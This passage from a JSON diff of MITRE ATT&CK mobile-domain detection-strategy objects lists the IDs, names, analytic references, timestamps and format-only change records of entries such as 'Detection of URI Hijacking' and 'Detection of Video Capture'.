+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--668d7e7b-dc4e-4f51-93b4-ef87cb15d507",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0657",
+                            "external_id": "DET0657"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Subvert Trust Controls",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b972ebf0-16d1-4bc2-980b-e8cb0947affa",
+                        "x-mitre-analytic--f3da45bb-921e-4b4c-8fc3-666c7a37dea6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8d518627-1df4-4bf8-b1fb-0828fb9f6d31",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0628",
+                            "external_id": "DET0628"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Supply Chain Compromise",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c1cdc6fb-9b7f-4076-9634-c939ddaef2bf",
+                        "x-mitre-analytic--9aa716a2-0301-49cd-89c0-a441e5da0551"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--611b9135-583e-47f8-b617-e9d52ae2d2c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0714",
+                            "external_id": "DET0714"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Suppress Application Icon",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--944c3eaa-2809-4db3-ac7c-d1868e205793"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0c01c90a-c8a9-40ee-b143-1e5b00f11e1f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0650",
+                            "external_id": "DET0650"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Symmetric Cryptography",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d5926b94-833c-4b29-b611-059f72fcda84",
+                        "x-mitre-analytic--6c776c7a-0e2f-4963-9485-aa90149ae68e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0bd280ab-7977-4ef9-b577-6c6a6014b179",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0625",
+                            "external_id": "DET0625"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Checks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--66adf2b9-42aa-401f-8bc3-3830854017ee",
+                        "x-mitre-analytic--c956f269-d282-4c68-afc6-ca68d8532ab6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0a60e161-3347-49e6-9687-123e8a06c620",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0601",
+                            "external_id": "DET0601"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Information Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--55699534-c11f-4f9b-8908-a0c7d59160fd",
+                        "x-mitre-analytic--04e54116-5787-4bb0-9c4a-2b620a80b5dc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--538bc808-b0f5-4f86-81f2-63be2cf63e80",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0634",
+                            "external_id": "DET0634"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Network Configuration Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f44bab9b-554c-4dc7-b57f-4011ce609c2b",
+                        "x-mitre-analytic--cb4c4b76-3f6d-4387-ab20-74b461bbb211"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ea45fed-cd52-4e26-96d5-31d3fd2c7b22",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0636",
+                            "external_id": "DET0636"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Network Connections Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--98dfbd23-232b-410a-bb71-25ba191ff746"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ffe1aba-c979-426b-b96c-7161679eb8a8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0689",
+                            "external_id": "DET0689"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Runtime API Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--90052e39-40c3-4194-a2a2-fc240639ab0f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4041b489-71a4-4995-9419-04bd75628f89",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0683",
+                            "external_id": "DET0683"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Transmitted Data Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6a3e1244-3832-4523-81bc-56598a280b16"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0ec6ab45-a114-4ded-ba5e-a16982ccd64b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0626",
+                            "external_id": "DET0626"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of URI Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5e90ac48-345b-445a-877f-596737ad7efb",
+                        "x-mitre-analytic--cbdcf6f3-00c3-4c38-bc7c-ffb6806f0a25"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5a9d7ef3-35bf-4a89-8f61-084e2eecc070",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0690",
+                            "external_id": "DET0690"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Uninstall Malicious Application",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--176d2eda-e41b-48d0-b66a-daaccb5a77cd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--34fc0ca7-338c-4eb4-b4ac-618f56378dd5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0607",
+                            "external_id": "DET0607"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Unix Shell",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f2c74903-6770-4f55-9a11-edcf6e00938e",
+                        "x-mitre-analytic--649ee05c-9f09-47fc-802a-7df2ce362563"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5d826975-65f1-4515-b8c1-15cecd3339ac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0699",
+                            "external_id": "DET0699"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of User Evasion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--89ee35d2-02ec-4c36-b51c-50e686eb3012"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cb6a0874-0cb3-4d44-a77e-e93d4a26d50b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0695",
+                            "external_id": "DET0695"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Video Capture",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4476a312-d2c9-459e-96a3-53ac0b676c52",
+                        "x-mitre-analytic--e6c05bf0-e6d6-46f9-ba38-11b58fbf2f26"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--24ad5d49-a170-4e03-a194-3cc68ee81e1e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0606",
+                            "external_id": "DET0606"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Virtualization Solution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d86a141c-b4fa-48fd-a15b-2cd3254b3400"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a5f6a93c-a8f9-4660-a6bc-63761a9ee94b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0616",
+                            "external_id": "DET0616"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Virtualization/Sandbox Evasion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5044447d-dc82-4d74-ac8c-02e5559f374c",
+                        "x-mitre-analytic--dd9778f4-5919-4796-9d4c-b3fb6ace453d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--395c6e70-21f8-4613-bdec-96ecba03a5b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0620",
+                            "external_id": "DET0620"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Protocols",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f12b94b0-ec2f-4eb1-9ea4-8632e41475a1",
+                        "x-mitre-analytic--a16c57b3-6a4c-4b15-92e9-d2d29f5b7d69"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
